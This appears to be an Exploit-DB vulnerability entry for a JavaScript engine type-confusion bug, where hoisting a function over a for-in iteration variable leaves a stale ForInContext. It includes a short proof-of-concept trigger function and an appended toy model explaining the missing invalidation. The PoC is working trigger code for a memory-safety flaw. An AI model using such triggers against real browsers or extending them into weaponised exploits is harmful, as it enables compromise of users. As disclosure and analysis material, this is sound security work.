Vendor: N/A
By: N/A
CVSS: 7.5 (HIGH)
CWE: 129 (Improper Validation of Array Index)
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: N/A
2020

Issue 1263

When a function is hoisted onto the outer scope and overwrites the iteration variable of a for-in loop, the corresponding ForInContext object should be invalidated, but it isn't. As a result, an arbitrary object can be passed as the property variable to the op_get_direct_pname handler, which uses the property variable directly as a string object without any check.

Mitigation:

Ensure that the iteration variable for a for-in loop is not overwritten.

Exploit-DB raw data:

/*
This is similar to issue 1263. When hoisting a function onto the outer scope, if it overwrites the iteration variable for a for-in loop it should invalidate the corresponding ForInContext object, but it doesn't. As a result, an arbitrary object can be passed as the property variable to the op_get_direct_pname handler which uses the property variable directly as a string object without any check.

PoC:
*/

function trigger() {
    let o = {a: 1};
    for (var k in o) {
        {
            k = 0x1234;

            function k() {

            }
        }

        o[k];
    }
}

trigger();
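
A simplified model of the missing invalidation for the loop shape in the PoC, added here as an illustration and not JavaScriptCore's own code. Only ForInContext and op_get_direct_pname come from the page; ToyGenerator, its methods, the "k@block" name and the op_get_by_val fallback are assumptions of the model.

```javascript
// Toy model of a bytecode generator's for-in fast path. Added illustration:
// class and method names are hypothetical, not JavaScriptCore source.
class ForInContext {
  constructor(local) { this.local = local; this.valid = true; }
}

class ToyGenerator {
  constructor(invalidateOnHoist) {
    this.invalidateOnHoist = invalidateOnHoist; // false models the bug
    this.forInStack = [];
    this.ops = [];
  }
  invalidate(local) {
    for (const ctx of this.forInStack) {
      if (ctx.local === local) ctx.valid = false;
    }
  }
  beginForIn(local) { this.forInStack.push(new ForInContext(local)); }
  endForIn() { this.forInStack.pop(); }
  // Plain assignment: any write to the iteration variable ends the fast path.
  emitAssign(local) {
    this.invalidate(local);
    this.ops.push(`mov ${local}`);
  }
  // Sloppy-mode hoisting copies the block-scoped binding into the outer var.
  emitHoist(blockLocal, outerLocal) {
    if (this.invalidateOnHoist) this.invalidate(outerLocal);
    this.ops.push(`mov ${outerLocal}, ${blockLocal}`);
  }
  // Unchecked opcode only while the property is still a live, valid for-in key.
  emitGetByVal(base, property) {
    const fast = this.forInStack.some(c => c.local === property && c.valid);
    const op = fast ? "op_get_direct_pname" : "op_get_by_val";
    this.ops.push(`${op} ${base}, ${property}`);
    return op;
  }
}

// The PoC's loop body: `k = 0x1234` writes the block-scoped k, then the
// declaration `function k() {}` copies that value to the outer var k.
function compilePocShape(invalidateOnHoist) {
  const g = new ToyGenerator(invalidateOnHoist);
  g.beginForIn("k");
  g.emitAssign("k@block");
  g.emitHoist("k@block", "k");
  const op = g.emitGetByVal("o", "k");
  g.endForIn();
  return op;
}

console.log(compilePocShape(false), compilePocShape(true));
```

With the hoist path left out of the invalidation, the model still selects the unchecked opcode for `o[k]`; once the hoist invalidates the context, it falls back to the checked lookup.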